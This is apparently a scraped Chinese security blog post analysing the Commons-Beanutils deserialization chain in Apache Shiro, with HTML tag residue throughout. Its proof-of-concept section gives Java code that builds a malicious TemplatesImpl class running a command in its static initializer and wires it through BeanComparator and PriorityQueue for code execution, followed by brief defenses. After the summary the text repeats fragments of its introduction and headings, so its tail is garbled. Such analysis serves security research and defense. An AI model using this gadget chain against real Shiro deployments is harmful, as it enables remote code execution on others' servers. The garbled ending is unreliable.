Apache Shiro中Commons-Beanutils(CB)反序列化链分析<\/h1>

一、简介<\/h2>
Commons-Beanutils是Apache开源组织提供的用于操作Java Bean的工具包，它能够方便地对bean对象的属性进行操作。在Shiro环境中，CB是自带的依赖，因此这条反序列化链较为常见。<\/p>

二、核心组件分析<\/h2>

1. PropertyUtils.getProperty()<\/h3>

PropertyUtils.getProperty()<\/code>是commons-beanutils中提供的静态方法，允许直接调用任意JavaBean的getter和setter方法。<\/p>

关键点：<\/p>


通过反射机制调用对象的getter方法<\/li>
可以触发任意getter方法的执行<\/li>
方法签名：public static Object getProperty(Object bean, String name)<\/code><\/li>
<\/ul>
2. TemplatesImpl利用链<\/h3>
TemplatesImpl类存在于com.sun.org.apache.xalan.internal.xsltc.trax<\/code>包中，是Java XML处理的一部分，可以被利用来执行任意代码。<\/p>
利用链：<\/p>
TemplatesImpl#getOutputProperties() 
→ TemplatesImpl#newTransformer() 
→ TemplatesImpl#getTransletInstance() 
→ TemplatesImpl#defineTransletClasses() 
→ TransletClassLoader#defineClass()
<\/code><\/pre>
关键点：<\/p>

通过_bytecodes<\/code>字段可以加载恶意类<\/li>
_name<\/code>字段需要设置为非空值<\/li>
_tfactory<\/code>字段需要设置为TransformerFactoryImpl实例<\/li>
静态代码块中的代码会在类加载时执行<\/li>
<\/ul>
3. BeanComparator类<\/h3>
BeanComparator<\/code>是commons-beanutils中的比较器实现，在比较时会调用PropertyUtils.getProperty()<\/code>方法。<\/p>
关键点：<\/p>

构造函数可以指定比较属性名<\/li>
compare()<\/code>方法会调用PropertyUtils.getProperty()<\/code><\/li>
默认比较属性为"null"<\/li>
<\/ul>
三、完整利用链分析<\/h2>
完整调用链：<\/p>
PriorityQueue.readObject() 
→ BeanComparator.compare() 
→ PropertyUtils.getProperty() 
→ TemplatesImpl.getOutputProperties() 
→ TemplatesImpl.newTransformer() 
→ TemplatesImpl.getTransletInstance() 
→ TemplatesImpl.defineTransletClasses() 
→ TransletClassLoader.defineClass() 
→ 恶意类静态代码块执行
<\/code><\/pre>
四、POC构造详解<\/h2>
1. 构造恶意类<\/h3>
使用Javassist工具构造恶意类：<\/p>
ClassPool classPool =<\/span> ClassPool.<\/span>getDefault<\/span>();<\/span>
<\/span><\/span>classPool.<\/span>insertClassPath<\/span>(<\/span>new<\/span> ClassClassPath(<\/span>AbstractTranslet.<\/span>class<\/span>));<\/span>
<\/span><\/span>CtClass testCtClass =<\/span> classPool.<\/span>makeClass<\/span>(<\/span>"test"<\/span>);<\/span>
<\/span><\/span>testCtClass.<\/span>setSuperclass<\/span>(<\/span>classPool.<\/span>get<\/span>(<\/span>AbstractTranslet.<\/span>class<\/span>.<\/span>getName<\/span>()));<\/span>
<\/span><\/span>CtConstructor ctConstructor =<\/span> testCtClass.<\/span>makeClassInitializer<\/span>();<\/span>
<\/span><\/span>ctConstructor.<\/span>insertBefore<\/span>(<\/span>"Runtime.getRuntime().exec(\"calc\")"<\/span>);<\/span>
<\/span><\/span>byte<\/span>[]<\/span> classBytes =<\/span> testCtClass.<\/span>toBytecode<\/span>();<\/span>
<\/span><\/span><\/code><\/pre>2. 设置TemplatesImpl<\/h3>
TemplatesImpl templates =<\/span> new<\/span> TemplatesImpl();<\/span>
<\/span><\/span>Field bytecodes =<\/span> TemplatesImpl.<\/span>class<\/span>.<\/span>getDeclaredField<\/span>(<\/span>"_bytecodes"<\/span>);<\/span>
<\/span><\/span>bytecodes.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>bytecodes.<\/span>set<\/span>(<\/span>templates,<\/span> new<\/span> byte<\/span>[][]<\/span> {<\/span>classBytes});<\/span>
<\/span><\/span>
<\/span><\/span>Field name =<\/span> TemplatesImpl.<\/span>class<\/span>.<\/span>getDeclaredField<\/span>(<\/span>"_name"<\/span>);<\/span>
<\/span><\/span>name.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>name.<\/span>set<\/span>(<\/span>templates,<\/span> "Test"<\/span>);<\/span>
<\/span><\/span>
<\/span><\/span>Field tfactory =<\/span> TemplatesImpl.<\/span>class<\/span>.<\/span>getDeclaredField<\/span>(<\/span>"_tfactory"<\/span>);<\/span>
<\/span><\/span>tfactory.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>tfactory.<\/span>set<\/span>(<\/span>templates,<\/span> new<\/span> TransformerFactoryImpl());<\/span>
<\/span><\/span><\/code><\/pre>3. 构造PriorityQueue链<\/h3>
BeanComparator comparator =<\/span> new<\/span> BeanComparator();<\/span>
<\/span><\/span>setFieldValue(<\/span>comparator,<\/span>"property"<\/span>,<\/span>"outputProperties"<\/span>);<\/span>
<\/span><\/span>
<\/span><\/span>PriorityQueue priorityQueue =<\/span> new<\/span> PriorityQueue(<\/span>2<\/span>,<\/span> comparator);<\/span>
<\/span><\/span>setFieldValue(<\/span>priorityQueue,<\/span>"queue"<\/span>,<\/span>new<\/span> Object[]{<\/span>templates,<\/span>templates});<\/span>
<\/span><\/span>setFieldValue(<\/span>priorityQueue,<\/span> "size"<\/span>,<\/span> 2<\/span>);<\/span>
<\/span><\/span><\/code><\/pre>4. 辅助方法<\/h3>
public<\/span> static<\/span> void<\/span> setFieldValue<\/span>(<\/span>final<\/span> Object obj,<\/span> final<\/span> String fieldName,<\/span> final<\/span> Object value)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>    final<\/span> Field field =<\/span> getField(<\/span>obj.<\/span>getClass<\/span>(),<\/span> fieldName);<\/span>
<\/span><\/span>    field.<\/span>set<\/span>(<\/span>obj,<\/span> value);<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span>
<\/span><\/span>public<\/span> static<\/span> Field getField<\/span>(<\/span>final<\/span> Class<?><\/span> clazz,<\/span> final<\/span> String fieldName)<\/span> {<\/span>
<\/span><\/span>    Field field =<\/span> null<\/span>;<\/span>
<\/span><\/span>    try<\/span> {<\/span>
<\/span><\/span>        field =<\/span> clazz.<\/span>getDeclaredField<\/span>(<\/span>fieldName);<\/span>
<\/span><\/span>        field.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>    }<\/span> catch<\/span> (<\/span>NoSuchFieldException ex)<\/span> {<\/span>
<\/span><\/span>        if<\/span> (<\/span>clazz.<\/span>getSuperclass<\/span>()<\/span> !=<\/span> null<\/span>)<\/span>
<\/span><\/span>            field =<\/span> getField(<\/span>clazz.<\/span>getSuperclass<\/span>(),<\/span> fieldName);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    return<\/span> field;<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>五、防御措施<\/h2>

升级commons-beanutils到最新版本<\/li>
在Shiro中配置反序列化过滤器<\/li>
使用安全管理器限制危险操作<\/li>
避免不可信数据的反序列化<\/li>
<\/ol>
六、总结<\/h2>
CB链是Shiro反序列化漏洞中常见的一条利用链，它结合了commons-beanutils的PropertyUtils.getProperty()<\/code>方法和TemplatesImpl的类加载机制，通过PriorityQueue触发，最终实现任意代码执行。理解这条链的构造原理对于防御此类攻击至关重要。<\/p>

Apache Shiro中Commons-Beanutils(CB)反序列化链分析<\/h1>

一、简介<\/h2> Commons-Beanutils是Apache开源组织提供的用于操作Java Bean的工具包，它能够方便地对bean对象的属性进行操作。在Shiro环境中，CB是自带的依赖，因此这条反序列化链较为常见。<\/p>

二、核心组件分析<\/h2>

四、POC构造详解<\/h2>

一、简介<\/h2>
Commons-Beanutils是Apache开源组织提供的用于操作Java Bean的工具包，它能够方便地对bean对象的属性进行操作。在Shiro环境中，CB是自带的依赖，因此这条反序列化链较为常见。<\/p>